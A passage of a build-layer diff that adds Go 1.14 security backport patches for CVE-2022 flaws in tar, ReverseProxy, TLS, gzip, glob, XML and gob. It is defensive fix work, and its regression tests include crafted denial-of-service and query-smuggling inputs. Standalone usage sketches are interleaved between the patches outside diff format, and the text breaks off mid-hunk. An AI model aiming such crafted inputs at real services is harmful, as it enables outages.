+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438498
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0a723816cd2]
+CVE: CVE-2022-2879
+Signed-off-by: Sunil Kumar <sukumar@mvista.com>
+---
+ src/archive/tar/format.go | 4 ++++
+ src/archive/tar/reader.go | 14 ++++++++++++--
+ src/archive/tar/writer.go | 3 +++
+ 3 files changed, 19 insertions(+), 2 deletions(-)
+
+diff --git a/src/archive/tar/format.go b/src/archive/tar/format.go
+index cfe24a5..6642364 100644
+--- a/src/archive/tar/format.go
++++ b/src/archive/tar/format.go
+@@ -143,6 +143,10 @@ const (
+ blockSize = 512 // Size of each block in a tar stream
+ nameSize = 100 // Max length of the name field in USTAR format
+ prefixSize = 155 // Max length of the prefix field in USTAR format
++
++ // Max length of a special file (PAX header, GNU long name or link).
++ // This matches the limit used by libarchive.
++ maxSpecialFileSize = 1 << 20
+ )
+
+ // blockPadding computes the number of bytes needed to pad offset up to the
+diff --git a/src/archive/tar/reader.go b/src/archive/tar/reader.go
+index 4f9135b..e996595 100644
+--- a/src/archive/tar/reader.go
++++ b/src/archive/tar/reader.go
+@@ -104,7 +104,7 @@ func (tr *Reader) next() (*Header, error) {
+ continue // This is a meta header affecting the next header
+ case TypeGNULongName, TypeGNULongLink:
+ format.mayOnlyBe(FormatGNU)
+- realname, err := ioutil.ReadAll(tr)
++ realname, err := readSpecialFile(tr)
+ if err != nil {
+ return nil, err
+ }
+@@ -294,7 +294,7 @@ func mergePAX(hdr *Header, paxHdrs map[string]string) (err error) {
+ // parsePAX parses PAX headers.
+ // If an extended header (type 'x') is invalid, ErrHeader is returned
+ func parsePAX(r io.Reader) (map[string]string, error) {
+- buf, err := ioutil.ReadAll(r)
++ buf, err := readSpecialFile(r)
+ if err != nil {
+ return nil, err
+ }
+@@ -827,6 +827,16 @@ func tryReadFull(r io.Reader, b []byte) (n int, err error) {
+ return n, err
+ }
+
++// readSpecialFile is like ioutil.ReadAll except it returns
++// ErrFieldTooLong if more than maxSpecialFileSize is read.
++func readSpecialFile(r io.Reader) ([]byte, error) {
++ buf, err := ioutil.ReadAll(io.LimitReader(r, maxSpecialFileSize+1))
++ if len(buf) > maxSpecialFileSize {
++ return nil, ErrFieldTooLong
++ }
++ return buf, err
++}
++
+ // discard skips n bytes in r, reporting an error if unable to do so.
+ func discard(r io.Reader, n int64) error {
+ // If possible, Seek to the last byte before the end of the data section.
+diff --git a/src/archive/tar/writer.go b/src/archive/tar/writer.go
+index e80498d..893eac0 100644
+--- a/src/archive/tar/writer.go
++++ b/src/archive/tar/writer.go
+@@ -199,6 +199,9 @@ func (tw *Writer) writePAXHeader(hdr *Header, paxHdrs map[string]string) error {
+ flag = TypeXHeader
+ }
+ data := buf.String()
++ if len(data) > maxSpecialFileSize {
++ return ErrFieldTooLong
++ }
+ if err := tw.writeRawFile(name, data, flag, FormatPAX); err != nil || isGlobal {
+ return err // Global headers return here
+ }
+--
+2.7.4
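
As a rough illustration of the writer-side check, separate from the patch itself: a PAX record larger than the new 1 MiB cap now fails up front. The file name and record size below are arbitrary placeholders.

package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"strings"
)

func main() {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	hdr := &tar.Header{
		Name:     "oversized-pax.txt",
		Mode:     0600,
		Typeflag: tar.TypeReg,
		// A single 2 MiB PAX record exceeds maxSpecialFileSize (1 MiB),
		// so the patched writer returns ErrFieldTooLong here.
		PAXRecords: map[string]string{"comment": strings.Repeat("x", 2<<20)},
	}
	if err := tw.WriteHeader(hdr); err != nil {
		fmt.Println("WriteHeader:", err)
		return
	}
	tw.Close()
}
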
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
new file mode 100644
index 0000000000..8376dc45ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
@@ -0,0 +1,164 @@
+From 753e3f8da191c2ac400407d83c70f46900769417 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 12:22:41 +0530
+Subject: [PATCH] CVE-2022-2880
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9d2c73a9fd69e45876509bb3bdb2af99bf77da1e]
+CVE: CVE-2022-2880
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http/httputil: avoid query parameter smuggling
+
+Query parameter smuggling occurs when a proxy's interpretation
+of query parameters differs from that of a downstream server.
+Change ReverseProxy to avoid forwarding ignored query parameters.
+
+Remove unparsable query parameters from the outbound request
+
+ * if req.Form != nil after calling ReverseProxy.Director; and
+ * before calling ReverseProxy.Rewrite.
+
+This change preserves the existing behavior of forwarding the
+raw query untouched if a Director hook does not parse the query
+by calling Request.ParseForm (possibly indirectly).
+---
+ src/net/http/httputil/reverseproxy.go | 36 +++++++++++
+ src/net/http/httputil/reverseproxy_test.go | 74 ++++++++++++++++++++++
+ 2 files changed, 110 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 2072a5f..c6fb873 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -212,6 +212,9 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ }
+
+ p.Director(outreq)
++ if outreq.Form != nil {
++ outreq.URL.RawQuery = cleanQueryParams(outreq.URL.RawQuery)
++ }
+ outreq.Close = false
+
+ reqUpType := upgradeType(outreq.Header)
+@@ -561,3 +564,36 @@ func (c switchProtocolCopier) copyToBackend(errc chan<- error) {
+ _, err := io.Copy(c.backend, c.user)
+ errc <- err
+ }
++
++func cleanQueryParams(s string) string {
++ reencode := func(s string) string {
++ v, _ := url.ParseQuery(s)
++ return v.Encode()
++ }
++ for i := 0; i < len(s); {
++ switch s[i] {
++ case ';':
++ return reencode(s)
++ case '%':
++ if i+2 >= len(s) || !ishex(s[i+1]) || !ishex(s[i+2]) {
++ return reencode(s)
++ }
++ i += 3
++ default:
++ i++
++ }
++ }
++ return s
++}
++
++func ishex(c byte) bool {
++ switch {
++ case '0' <= c && c <= '9':
++ return true
++ case 'a' <= c && c <= 'f':
++ return true
++ case 'A' <= c && c <= 'F':
++ return true
++ }
++ return false
++}
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 9a7223a..bc87a3b 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1269,3 +1269,77 @@ func TestSingleJoinSlash(t *testing.T) {
+ }
+ }
+ }
++
++const (
++ testWantsCleanQuery = true
++ testWantsRawQuery = false
++)
++
++func TestReverseProxyQueryParameterSmugglingDirectorDoesNotParseForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsRawQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func TestReverseProxyQueryParameterSmugglingDirectorParsesForm(t *testing.T) {
++ testReverseProxyQueryParameterSmuggling(t, testWantsCleanQuery, func(u *url.URL) *ReverseProxy {
++ proxyHandler := NewSingleHostReverseProxy(u)
++ oldDirector := proxyHandler.Director
++ proxyHandler.Director = func(r *http.Request) {
++ // Parsing the form causes ReverseProxy to remove unparsable
++ // query parameters before forwarding.
++ r.FormValue("a")
++ oldDirector(r)
++ }
++ return proxyHandler
++ })
++}
++
++func testReverseProxyQueryParameterSmuggling(t *testing.T, wantCleanQuery bool, newProxy func(*url.URL) *ReverseProxy) {
++ const content = "response_content"
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ w.Write([]byte(r.URL.RawQuery))
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := newProxy(backendURL)
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++
++ // Don't spam output with logs of queries containing semicolons.
++ backend.Config.ErrorLog = log.New(io.Discard, "", 0)
++ frontend.Config.ErrorLog = log.New(io.Discard, "", 0)
++
++ for _, test := range []struct {
++ rawQuery string
++ cleanQuery string
++ }{{
++ rawQuery: "a=1&a=2;b=3",
++ cleanQuery: "a=1",
++ }, {
++ rawQuery: "a=1&a=%zz&b=3",
++ cleanQuery: "a=1&b=3",
++ }} {
++ res, err := frontend.Client().Get(frontend.URL + "?" + test.rawQuery)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ body, _ := io.ReadAll(res.Body)
++ wantQuery := test.rawQuery
++ if wantCleanQuery {
++ wantQuery = test.cleanQuery
++ }
++ if got, want := string(body), wantQuery; got != want {
++ t.Errorf("proxy forwarded raw query %q as %q, want %q", test.rawQuery, got, want)
++ }
++ }
++}
+--
+2.25.1
+
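A hedged usage sketch, separate from the patch itself: a proxy only opts into the new query cleaning when its Director has parsed the form, as the tests above exercise. The listen and backend addresses are placeholders.

package main

import (
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
)

func main() {
	backend, err := url.Parse("http://127.0.0.1:8080") // placeholder backend
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(backend)
	director := proxy.Director
	proxy.Director = func(r *http.Request) {
		// Parsing the form sets r.Form, so the patched ServeHTTP re-encodes
		// the query and drops unparsable parameters (e.g. "a=%zz" or
		// semicolon-separated pairs) before forwarding.
		_ = r.ParseForm()
		director(r)
	}
	log.Fatal(http.ListenAndServe("127.0.0.1:9090", proxy))
}
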
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
new file mode 100644
index 0000000000..47313a547f
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
@@ -0,0 +1,47 @@
+From 8d0bbb5a6280c2cf951241ec7f6579c90d38df57 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 10:55:08 +0530
+Subject: [PATCH] CVE-2022-30629
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c15a8e2dbb5ac376a6ed890735341b812d6b965c]
+CVE: CVE-2022-30629
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/crypto/tls/handshake_server_tls13.go | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_server_tls13.go b/src/crypto/tls/handshake_server_tls13.go
+index 5432145..d91797e 100644
+--- a/src/crypto/tls/handshake_server_tls13.go
++++ b/src/crypto/tls/handshake_server_tls13.go
+@@ -9,6 +9,7 @@ import (
+ "crypto"
+ "crypto/hmac"
+ "crypto/rsa"
++ "encoding/binary"
+ "errors"
+ "hash"
+ "io"
+@@ -742,6 +743,19 @@ func (hs *serverHandshakeStateTLS13) sendSessionTickets() error {
+ }
+ m.lifetime = uint32(maxSessionTicketLifetime / time.Second)
+
++ // ticket_age_add is a random 32-bit value. See RFC 8446, section 4.6.1
++ // The value is not stored anywhere; we never need to check the ticket age
++ // because 0-RTT is not supported.
++ ageAdd := make([]byte, 4)
++ _, err = hs.c.config.rand().Read(ageAdd)
++ if err != nil {
++ return err
++ }
++ m.ageAdd = binary.LittleEndian.Uint32(ageAdd)
++
++ // ticket_nonce, which must be unique per connection, is always left at
++ // zero because we only ever send one ticket per connection.
++
+ if _, err := c.writeRecord(recordTypeHandshake, m.marshal()); err != nil {
+ return err
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
new file mode 100644
index 0000000000..5dcfd27f16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
@@ -0,0 +1,116 @@
+From d10fc3a84e3344f2421c1dd3046faa50709ab4d5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 11:01:21 +0530
+Subject: [PATCH] CVE-2022-30631
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0117dee7dccbbd7803d88f65a2ce8bd686219ad3]
+CVE: CVE-2022-30631
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/compress/gzip/gunzip.go | 60 +++++++++++++++-----------------
+ src/compress/gzip/gunzip_test.go | 16 +++++++++
+ 2 files changed, 45 insertions(+), 31 deletions(-)
+
+diff --git a/src/compress/gzip/gunzip.go b/src/compress/gzip/gunzip.go
+index 924bce1..237b2b9 100644
+--- a/src/compress/gzip/gunzip.go
++++ b/src/compress/gzip/gunzip.go
+@@ -248,42 +248,40 @@ func (z *Reader) Read(p []byte) (n int, err error) {
+ return 0, z.err
+ }
+
+- n, z.err = z.decompressor.Read(p)
+- z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
+- z.size += uint32(n)
+- if z.err != io.EOF {
+- // In the normal case we return here.
+- return n, z.err
+- }
++ for n == 0 {
++ n, z.err = z.decompressor.Read(p)
++ z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
++ z.size += uint32(n)
++ if z.err != io.EOF {
++ // In the normal case we return here.
++ return n, z.err
++ }
+
+- // Finished file; check checksum and size.
+- if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
+- z.err = noEOF(err)
+- return n, z.err
+- }
+- digest := le.Uint32(z.buf[:4])
+- size := le.Uint32(z.buf[4:8])
+- if digest != z.digest || size != z.size {
+- z.err = ErrChecksum
+- return n, z.err
+- }
+- z.digest, z.size = 0, 0
++ // Finished file; check checksum and size.
++ if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
++ z.err = noEOF(err)
++ return n, z.err
++ }
++ digest := le.Uint32(z.buf[:4])
++ size := le.Uint32(z.buf[4:8])
++ if digest != z.digest || size != z.size {
++ z.err = ErrChecksum
++ return n, z.err
++ }
++ z.digest, z.size = 0, 0
+
+- // File is ok; check if there is another.
+- if !z.multistream {
+- return n, io.EOF
+- }
+- z.err = nil // Remove io.EOF
++ // File is ok; check if there is another.
++ if !z.multistream {
++ return n, io.EOF
++ }
++ z.err = nil // Remove io.EOF
+
+- if _, z.err = z.readHeader(); z.err != nil {
+- return n, z.err
++ if _, z.err = z.readHeader(); z.err != nil {
++ return n, z.err
++ }
+ }
+
+- // Read from next file, if necessary.
+- if n > 0 {
+- return n, nil
+- }
+- return z.Read(p)
++ return n, nil
+ }
+
+ // Close closes the Reader. It does not close the underlying io.Reader.
+diff --git a/src/compress/gzip/gunzip_test.go b/src/compress/gzip/gunzip_test.go
+index 1b01404..95220ae 100644
+--- a/src/compress/gzip/gunzip_test.go
++++ b/src/compress/gzip/gunzip_test.go
+@@ -516,3 +516,19 @@ func TestTruncatedStreams(t *testing.T) {
+ }
+ }
+ }
++
++func TestCVE202230631(t *testing.T) {
++ var empty = []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
++ 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
++ r := bytes.NewReader(bytes.Repeat(empty, 4e6))
++ z, err := NewReader(r)
++ if err != nil {
++ t.Fatalf("NewReader: got %v, want nil", err)
++ }
++ // Prior to CVE-2022-30631 fix, this would cause an unrecoverable panic due
++ // to stack exhaustion.
++ _, err = z.Read(make([]byte, 10))
++ if err != io.EOF {
++ t.Errorf("Reader.Read: got %v, want %v", err, io.EOF)
++ }
++}
+--
+2.25.1
+
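For context, a caller-level sketch separate from the patch itself: a stream of many empty gzip members is now consumed by the loop inside Read instead of one recursive call per member. The member bytes match those in the test above; the repeat count is arbitrary.

package main

import (
	"bytes"
	"compress/gzip"
	"fmt"
	"io"
	"io/ioutil"
)

func main() {
	// A single empty gzip member (same bytes as in gunzip_test.go above).
	empty := []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
		0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
	z, err := gzip.NewReader(bytes.NewReader(bytes.Repeat(empty, 1000000)))
	if err != nil {
		fmt.Println("NewReader:", err)
		return
	}
	// With the loop in Read, this completes without deep recursion.
	n, err := io.Copy(ioutil.Discard, z)
	fmt.Println(n, err)
}
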
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
new file mode 100644
index 0000000000..c54ef56a0e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
@@ -0,0 +1,71 @@
+From 35d1dfe9746029aea9027b405c75555d41ffd2f8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:12:40 +0530
+Subject: [PATCH] CVE-2022-30632
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/76f8b7304d1f7c25834e2a0cc9e88c55276c47df]
+CVE: CVE-2022-30632
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/path/filepath/match.go | 16 +++++++++++++++-
+ src/path/filepath/match_test.go | 10 ++++++++++
+ 2 files changed, 25 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/match.go b/src/path/filepath/match.go
+index 46badb5..ba68daa 100644
+--- a/src/path/filepath/match.go
++++ b/src/path/filepath/match.go
+@@ -232,6 +232,20 @@ func getEsc(chunk string) (r rune, nchunk string, err error) {
+ // The only possible returned error is ErrBadPattern, when pattern
+ // is malformed.
+ func Glob(pattern string) (matches []string, err error) {
++ return globWithLimit(pattern, 0)
++}
++
++func globWithLimit(pattern string, depth int) (matches []string, err error) {
++ // This limit is used prevent stack exhaustion issues. See CVE-2022-30632.
++ const pathSeparatorsLimit = 10000
++ if depth == pathSeparatorsLimit {
++ return nil, ErrBadPattern
++ }
++
++ // Check pattern is well-formed.
++ if _, err := Match(pattern, ""); err != nil {
++ return nil, err
++ }
+ if !hasMeta(pattern) {
+ if _, err = os.Lstat(pattern); err != nil {
+ return nil, nil
+@@ -257,7 +271,7 @@ func Glob(pattern string) (matches []string, err error) {
+ }
+
+ var m []string
+- m, err = Glob(dir)
++ m, err = globWithLimit(dir, depth+1)
+ if err != nil {
+ return
+ }
+diff --git a/src/path/filepath/match_test.go b/src/path/filepath/match_test.go
+index b865762..c37c812 100644
+--- a/src/path/filepath/match_test.go
++++ b/src/path/filepath/match_test.go
+@@ -154,6 +154,16 @@ func TestGlob(t *testing.T) {
+ }
+ }
+
++func TestCVE202230632(t *testing.T) {
++ // Prior to CVE-2022-30632, this would cause a stack exhaustion given a
++ // large number of separators (more than 4,000,000). There is now a limit
++ // of 10,000.
++ _, err := Glob("/*" + strings.Repeat("/", 10001))
++ if err != ErrBadPattern {
++ t.Fatalf("Glob returned err=%v, want ErrBadPattern", err)
++ }
++}
++
+ func TestGlobError(t *testing.T) {
+ _, err := Glob("[]")
+ if err == nil {
+--
+2.25.1
+
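A brief caller-level sketch, mirroring the test above rather than adding to the patch: patterns with an excessive number of path separators now fail with ErrBadPattern instead of recursing once per separator.

package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

func main() {
	// Well over the new limit of 10,000 separators.
	pattern := "/*" + strings.Repeat("/", 20000)
	_, err := filepath.Glob(pattern)
	fmt.Println(err == filepath.ErrBadPattern) // true with the patch applied
}
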
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
new file mode 100644
index 0000000000..c16cb5f50c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
@@ -0,0 +1,131 @@
+From ab6e2ffdcab0501bcc2de4b196c1c18ae2301d4b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:29:55 +0530
+Subject: [PATCH] CVE-2022-30633
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2678d0c957193dceef336c969a9da74dd716a827]
+CVE: CVE-2022-30633
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/xml/read.go | 27 +++++++++++++++++++--------
+ src/encoding/xml/read_test.go | 14 ++++++++++++++
+ 2 files changed, 33 insertions(+), 8 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 10a60ee..4ffed80 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -148,7 +148,7 @@ func (d *Decoder) DecodeElement(v interface{}, start *StartElement) error {
+ if val.Kind() != reflect.Ptr {
+ return errors.New("non-pointer passed to Unmarshal")
+ }
+- return d.unmarshal(val.Elem(), start)
++ return d.unmarshal(val.Elem(), start, 0)
+ }
+
+ // An UnmarshalError represents an error in the unmarshaling process.
+@@ -304,8 +304,15 @@ var (
+ textUnmarshalerType = reflect.TypeOf((*encoding.TextUnmarshaler)(nil)).Elem()
+ )
+
++const maxUnmarshalDepth = 10000
++
++var errExeceededMaxUnmarshalDepth = errors.New("exceeded max depth")
++
+ // Unmarshal a single XML element into val.
+-func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
++func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
++ if depth >= maxUnmarshalDepth {
++ return errExeceededMaxUnmarshalDepth
++ }
+ // Find start element if we need it.
+ if start == nil {
+ for {
+@@ -398,7 +405,7 @@ func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
+ v.Set(reflect.Append(val, reflect.Zero(v.Type().Elem())))
+
+ // Recur to read element into slice.
+- if err := d.unmarshal(v.Index(n), start); err != nil {
++ if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
+ v.SetLen(n)
+ return err
+ }
+@@ -521,13 +528,15 @@ Loop:
+ case StartElement:
+ consumed := false
+ if sv.IsValid() {
+- consumed, err = d.unmarshalPath(tinfo, sv, nil, &t)
++ // unmarshalPath can call unmarshal, so we need to pass the depth through so that
++ // we can continue to enforce the maximum recusion limit.
++ consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
+ if err != nil {
+ return err
+ }
+ if !consumed && saveAny.IsValid() {
+ consumed = true
+- if err := d.unmarshal(saveAny, &t); err != nil {
++ if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
+ return err
+ }
+ }
+@@ -672,7 +681,7 @@ func copyValue(dst reflect.Value, src []byte) (err error) {
+ // The consumed result tells whether XML elements have been consumed
+ // from the Decoder until start's matching end element, or if it's
+ // still untouched because start is uninteresting for sv's fields.
+-func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement) (consumed bool, err error) {
++func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
+ recurse := false
+ Loop:
+ for i := range tinfo.fields {
+@@ -687,7 +696,7 @@ Loop:
+ }
+ if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
+ // It's a perfect match, unmarshal the field.
+- return true, d.unmarshal(finfo.value(sv), start)
++ return true, d.unmarshal(finfo.value(sv), start, depth+1)
+ }
+ if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
+ // It's a prefix for the field. Break and recurse
+@@ -716,7 +725,9 @@ Loop:
+ }
+ switch t := tok.(type) {
+ case StartElement:
+- consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t)
++ // the recursion depth of unmarshalPath is limited to the path length specified
++ // by the struct field tag, so we don't increment the depth here.
++ consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
+ if err != nil {
+ return true, err
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 8c2e70f..6a20b1a 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,6 +5,7 @@
+ package xml
+
+ import (
++ "errors"
+ "io"
+ "reflect"
+ "strings"
+@@ -1079,3 +1080,16 @@ func TestUnmarshalWhitespaceAttrs(t *testing.T) {
+ t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want)
+ }
+ }
++
++func TestCVE202228131(t *testing.T) {
++ type nested struct {
++ Parent *nested `xml:",any"`
++ }
++ var n nested
++ err := Unmarshal(bytes.Repeat([]byte("<a>"), maxUnmarshalDepth+1), &n)
++ if err == nil {
++ t.Fatal("Unmarshal did not fail")
++ } else if !errors.Is(err, errExeceededMaxUnmarshalDepth) {
++ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
new file mode 100644
index 0000000000..73959f70fa
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
@@ -0,0 +1,120 @@
+From fdd4316737ed5681689a1f40802ffa0805e5b11c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:17:05 +0530
+Subject: [PATCH] CVE-2022-30635
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/cd54600b866db0ad068ab8df06c7f5f6cb55c9b3]
+CVE: CVE-2022-30635
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/gob/decode.go | 19 ++++++++++++-------
+ src/encoding/gob/gobencdec_test.go | 24 ++++++++++++++++++++++++
+ 2 files changed, 36 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/gob/decode.go b/src/encoding/gob/decode.go
+index d2f6c74..0e0ec75 100644
+--- a/src/encoding/gob/decode.go
++++ b/src/encoding/gob/decode.go
+@@ -871,8 +871,13 @@ func (dec *Decoder) decOpFor(wireId typeId, rt reflect.Type, name string, inProg
+ return &op
+ }
+
++var maxIgnoreNestingDepth = 10000
++
+ // decIgnoreOpFor returns the decoding op for a field that has no destination.
+-func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp) *decOp {
++func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp, depth int) *decOp {
++ if depth > maxIgnoreNestingDepth {
++ error_(errors.New("invalid nesting depth"))
++ }
+ // If this type is already in progress, it's a recursive type (e.g. map[string]*T).
+ // Return the pointer to the op we're already building.
+ if opPtr := inProgress[wireId]; opPtr != nil {
+@@ -896,7 +901,7 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ errorf("bad data: undefined type %s", wireId.string())
+ case wire.ArrayT != nil:
+ elemId := wire.ArrayT.Elem
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreArray(state, *elemOp, wire.ArrayT.Len)
+ }
+@@ -904,15 +909,15 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ case wire.MapT != nil:
+ keyId := dec.wireType[wireId].MapT.Key
+ elemId := dec.wireType[wireId].MapT.Elem
+- keyOp := dec.decIgnoreOpFor(keyId, inProgress)
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ keyOp := dec.decIgnoreOpFor(keyId, inProgress, depth+1)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreMap(state, *keyOp, *elemOp)
+ }
+
+ case wire.SliceT != nil:
+ elemId := wire.SliceT.Elem
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreSlice(state, *elemOp)
+ }
+@@ -1073,7 +1078,7 @@ func (dec *Decoder) compileSingle(remoteId typeId, ut *userTypeInfo) (engine *de
+ func (dec *Decoder) compileIgnoreSingle(remoteId typeId) *decEngine {
+ engine := new(decEngine)
+ engine.instr = make([]decInstr, 1) // one item
+- op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp))
++ op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp), 0)
+ ovfl := overflow(dec.typeString(remoteId))
+ engine.instr[0] = decInstr{*op, 0, nil, ovfl}
+ engine.numInstr = 1
+@@ -1118,7 +1123,7 @@ func (dec *Decoder) compileDec(remoteId typeId, ut *userTypeInfo) (engine *decEn
+ localField, present := srt.FieldByName(wireField.Name)
+ // TODO(r): anonymous names
+ if !present || !isExported(wireField.Name) {
+- op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp))
++ op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp), 0)
